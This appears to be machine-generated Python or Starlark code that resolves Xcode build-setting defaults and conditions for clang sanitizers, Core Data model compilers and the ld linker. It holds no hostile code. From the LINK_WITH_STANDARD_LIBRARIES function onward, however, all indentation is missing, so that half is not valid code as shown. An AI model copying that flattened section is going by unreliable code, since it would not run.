    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__Condition(xcconfigs, id_configs):
    # $(CLANG_UNDEFINED_BEHAVIOR_SANITIZER) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_UNDEFINED_BEHAVIOR_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_INTEGER__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__Condition(xcconfigs, id_configs):
    # $(CLANG_UNDEFINED_BEHAVIOR_SANITIZER) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CLANG_UNDEFINED_BEHAVIOR_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_compilers_llvm_clang_1_0__CLANG_UNDEFINED_BEHAVIOR_SANITIZER_NULLABILITY__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_PATH__DefaultValue(xcconfigs, id_configs):
    # $(INDEX_DATA_STORE_DIR)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "INDEX_DATA_STORE_DIR"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__Condition(xcconfigs, id_configs):
    # $(COMPILER_INDEX_STORE_ENABLE) == YES || ( $(COMPILER_INDEX_STORE_ENABLE) == Default && $(GCC_OPTIMIZATION_LEVEL) == 0 )
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "COMPILER_INDEX_STORE_ENABLE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "GCC_OPTIMIZATION_LEVEL"
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, (eval_val_0 == "YES" or (eval_val_0 == "Default" and eval_val_1 == "0")))
def _com_apple_compilers_llvm_clang_1_0__CLANG_INDEX_STORE_ENABLE__DefaultValue(xcconfigs, id_configs):
    # $(INDEX_ENABLE_DATA_STORE)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "INDEX_ENABLE_DATA_STORE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_THREAD_SANITIZER__DefaultValue(xcconfigs, id_configs):
    # $(ENABLE_THREAD_SANITIZER)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "ENABLE_THREAD_SANITIZER"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_PRECHECK__DefaultValue(xcconfigs, id_configs):
    # donothing
    return (False, "donothing")
def _com_apple_compilers_llvm_clang_1_0__CLANG_ARC_MIGRATE_EMIT_ERROR__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__DefaultValue(xcconfigs, id_configs):
    # $(MOMC_OUTPUT_SUFFIX_$(InputFileSuffix))
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "InputFileSuffix"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "MOMC_OUTPUT_SUFFIX_{eval_val_0}".format(eval_val_0 = eval_val_0)
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodeld__DefaultValue(xcconfigs, id_configs):
    # .momd
    return (False, ".momd")
def _com_apple_compilers_model_coredata__MOMC_OUTPUT_SUFFIX__xcdatamodel__DefaultValue(xcconfigs, id_configs):
    # .mom
    return (False, ".mom")
def _com_apple_compilers_model_coredata__DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
    # $($(DEPLOYMENT_TARGET_SETTING_NAME))
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = eval_val_0
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredata__MOMC_NO_WARNINGS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_INVERSE_RELATIONSHIP_WARNINGS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_MAX_PROPERTY_COUNT_WARNINGS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_NO_DELETE_RULE_WARNINGS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_SUPPRESS_INVERSE_TRANSIENT_ERROR__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredata__MOMC_MODULE__DefaultValue(xcconfigs, id_configs):
    # $(PRODUCT_MODULE_NAME)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "PRODUCT_MODULE_NAME"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_compilers_model_coredata__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
    #
    return (False, "")
def _com_apple_compilers_model_coredatamapping__MAPC_NO_WARNINGS__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_compilers_model_coredatamapping__DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
    # $($(DEPLOYMENT_TARGET_SETTING_NAME))
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = eval_val_0
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    return (used_user_content, eval_val_1)
def _com_apple_compilers_model_coredatamapping__build_file_compiler_flags__DefaultValue(xcconfigs, id_configs):
    #
    return (False, "")
def _com_apple_compilers_model_coredatamapping__MAPC_MODULE__DefaultValue(xcconfigs, id_configs):
    # $(PRODUCT_MODULE_NAME)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "PRODUCT_MODULE_NAME"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__Condition(xcconfigs, id_configs):
    # $(USE_LLVM_TARGET_TRIPLES_FOR_LD) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_ARCHS__DefaultValue(xcconfigs, id_configs):
    # $(CURRENT_ARCH)
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "CURRENT_ARCH"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_TARGET_TRIPLE_VARIANTS__Condition(xcconfigs, id_configs):
    # $(USE_LLVM_TARGET_TRIPLES_FOR_LD) == YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__arch__Condition(xcconfigs, id_configs):
    # $(USE_LLVM_TARGET_TRIPLES_FOR_LD) != YES
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_pbx_linkers_ld____INPUT_FILE_LIST_PATH____DefaultValue(xcconfigs, id_configs):
    # $(LINK_FILE_LIST_$(variant)_$(arch))
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "variant"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "arch"
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    eval_val_2 = ""
    eval_key_2 = "LINK_FILE_LIST_{eval_val_0}_{eval_val_1}".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1)
    if eval_key_2 in xcconfigs:
        eval_val_2 = xcconfigs[eval_key_2]
        used_user_content = True
    elif eval_key_2 in id_configs:
        opt = id_configs[eval_key_2]
        if "DefaultValue" in opt:
            (eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_2_used_user_content
    return (used_user_content, eval_val_2)
def _com_apple_pbx_linkers_ld__LINKER_DISPLAYS_MANGLED_NAMES__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_pbx_linkers_ld__EXPORTED_SYMBOLS_FILE__Condition(xcconfigs, id_configs):
    # $(SEPARATE_SYMBOL_EDIT) == NO
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "SEPARATE_SYMBOL_EDIT"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_pbx_linkers_ld__UNEXPORTED_SYMBOLS_FILE__Condition(xcconfigs, id_configs):
    # $(SEPARATE_SYMBOL_EDIT) == NO
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "SEPARATE_SYMBOL_EDIT"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "NO"))
def _com_apple_pbx_linkers_ld__GENERATE_PROFILING_CODE__Condition(xcconfigs, id_configs):
    # $(variant) == profile
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "variant"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "profile"))
def _com_apple_pbx_linkers_ld__LD_NO_PIE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__Condition(xcconfigs, id_configs):
    # $(MACH_O_TYPE) == mh_dylib
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "MACH_O_TYPE"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    return (used_user_content, (eval_val_0 == "mh_dylib"))
def _com_apple_pbx_linkers_ld__LD_DYLIB_INSTALL_NAME__DefaultValue(xcconfigs, id_configs):
    #
    return (False, "")
def _com_apple_pbx_linkers_ld__LD_RUNPATH_SEARCH_PATHS__DefaultValue(xcconfigs, id_configs):
    #
    return (False, "")
def _com_apple_pbx_linkers_ld__LD_GENERATE_MAP_FILE__DefaultValue(xcconfigs, id_configs):
    # NO
    return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_MAP_FILE_PATH__DefaultValue(xcconfigs, id_configs):
    # $(TARGET_TEMP_DIR)/$(PRODUCT_NAME)-LinkMap-$(CURRENT_VARIANT)-$(CURRENT_ARCH).txt
    used_user_content = False
    eval_val_0 = ""
    eval_key_0 = "TARGET_TEMP_DIR"
    if eval_key_0 in xcconfigs:
        eval_val_0 = xcconfigs[eval_key_0]
        used_user_content = True
    elif eval_key_0 in id_configs:
        opt = id_configs[eval_key_0]
        if "DefaultValue" in opt:
            (eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_0_used_user_content
    eval_val_1 = ""
    eval_key_1 = "PRODUCT_NAME"
    if eval_key_1 in xcconfigs:
        eval_val_1 = xcconfigs[eval_key_1]
        used_user_content = True
    elif eval_key_1 in id_configs:
        opt = id_configs[eval_key_1]
        if "DefaultValue" in opt:
            (eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_1_used_user_content
    eval_val_2 = ""
    eval_key_2 = "CURRENT_VARIANT"
    if eval_key_2 in xcconfigs:
        eval_val_2 = xcconfigs[eval_key_2]
        used_user_content = True
    elif eval_key_2 in id_configs:
        opt = id_configs[eval_key_2]
        if "DefaultValue" in opt:
            (eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_2_used_user_content
    eval_val_3 = ""
    eval_key_3 = "CURRENT_ARCH"
    if eval_key_3 in xcconfigs:
        eval_val_3 = xcconfigs[eval_key_3]
        used_user_content = True
    elif eval_key_3 in id_configs:
        opt = id_configs[eval_key_3]
        if "DefaultValue" in opt:
            (eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
            used_user_content = used_user_content or eval_val_3_used_user_content
    return (used_user_content, "{eval_val_0}/{eval_val_1}-LinkMap-{eval_val_2}-{eval_val_3}.txt".format(eval_val_0 = eval_val_0, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2, eval_val_3 = eval_val_3))
def _com_apple_pbx_linkers_ld__LINK_WITH_STANDARD_LIBRARIES__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__Condition(xcconfigs, id_configs):
# $(USE_LLVM_TARGET_TRIPLES_FOR_LD) != YES
used_user_content = False
eval_val_0 = ""
eval_key_0 = "USE_LLVM_TARGET_TRIPLES_FOR_LD"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "YES"))
def _com_apple_pbx_linkers_ld__LD_DEPLOYMENT_TARGET__DefaultValue(xcconfigs, id_configs):
# $($(DEPLOYMENT_TARGET_SETTING_NAME))
used_user_content = False
eval_val_0 = ""
eval_key_0 = "DEPLOYMENT_TARGET_SETTING_NAME"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = eval_val_0
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
return (used_user_content, eval_val_1)
def _com_apple_pbx_linkers_ld__KEEP_PRIVATE_EXTERNS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__Condition(xcconfigs, id_configs):
# $(MACH_O_TYPE) != mh_object
used_user_content = False
eval_val_0 = ""
eval_key_0 = "MACH_O_TYPE"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 != "mh_object"))
def _com_apple_pbx_linkers_ld__DEAD_CODE_STRIPPING__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__PRESERVE_DEAD_CODE_INITS_AND_TERMS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__BUNDLE_LOADER__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__ORDER_FILE__DefaultValue(xcconfigs, id_configs):
#
return (False, "")
def _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__Condition(xcconfigs, id_configs):
# $(GCC_GENERATE_DEBUGGING_SYMBOLS)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_GENERATE_DEBUGGING_SYMBOLS"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "YES"))
def _com_apple_pbx_linkers_ld__LD_LTO_OBJECT_FILE__DefaultValue(xcconfigs, id_configs):
# $(OBJECT_FILE_DIR_$(CURRENT_VARIANT))/$(CURRENT_ARCH)/$(PRODUCT_NAME)_lto.o
used_user_content = False
eval_val_0 = ""
eval_key_0 = "CURRENT_VARIANT"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
eval_val_1 = ""
eval_key_1 = "CURRENT_ARCH"
if eval_key_1 in xcconfigs:
eval_val_1 = xcconfigs[eval_key_1]
used_user_content = True
elif eval_key_1 in id_configs:
opt = id_configs[eval_key_1]
if "DefaultValue" in opt:
(eval_val_1_used_user_content, eval_val_1) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_1_used_user_content
eval_val_2 = ""
eval_key_2 = "PRODUCT_NAME"
if eval_key_2 in xcconfigs:
eval_val_2 = xcconfigs[eval_key_2]
used_user_content = True
elif eval_key_2 in id_configs:
opt = id_configs[eval_key_2]
if "DefaultValue" in opt:
(eval_val_2_used_user_content, eval_val_2) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_2_used_user_content
eval_val_3 = ""
eval_key_3 = "OBJECT_FILE_DIR_{eval_val_0}".format(eval_val_0 = eval_val_0)
if eval_key_3 in xcconfigs:
eval_val_3 = xcconfigs[eval_key_3]
used_user_content = True
elif eval_key_3 in id_configs:
opt = id_configs[eval_key_3]
if "DefaultValue" in opt:
(eval_val_3_used_user_content, eval_val_3) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_3_used_user_content
return (used_user_content, "{eval_val_3}/{eval_val_1}/{eval_val_2}_lto.o".format(eval_val_3 = eval_val_3, eval_val_1 = eval_val_1, eval_val_2 = eval_val_2))
def _com_apple_pbx_linkers_ld__LD_EXPORT_GLOBAL_SYMBOLS__DefaultValue(xcconfigs, id_configs):
# NO
return (False, "NO")
def _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__Condition(xcconfigs, id_configs):
# $(GCC_OPTIMIZATION_LEVEL) == '0'
used_user_content = False
eval_val_0 = ""
eval_key_0 = "GCC_OPTIMIZATION_LEVEL"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, (eval_val_0 == "0"))
def _com_apple_pbx_linkers_ld__LD_DONT_RUN_DEDUPLICATION__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
def _com_apple_pbx_linkers_ld__LD_OBJC_ABI_VERSION__DefaultValue(xcconfigs, id_configs):
# $(OBJC_ABI_VERSION)
used_user_content = False
eval_val_0 = ""
eval_key_0 = "OBJC_ABI_VERSION"
if eval_key_0 in xcconfigs:
eval_val_0 = xcconfigs[eval_key_0]
used_user_content = True
elif eval_key_0 in id_configs:
opt = id_configs[eval_key_0]
if "DefaultValue" in opt:
(eval_val_0_used_user_content, eval_val_0) = XCSPEC_EVALS[opt["DefaultValue"]](xcconfigs, id_configs)
used_user_content = used_user_content or eval_val_0_used_user_content
return (used_user_content, eval_val_0)
def _com_apple_pbx_linkers_ld__LD_QUOTE_LINKER_ARGUMENTS_FOR_COMPILER_DRIVER__DefaultValue(xcconfigs, id_configs):
# YES
return (False, "YES")
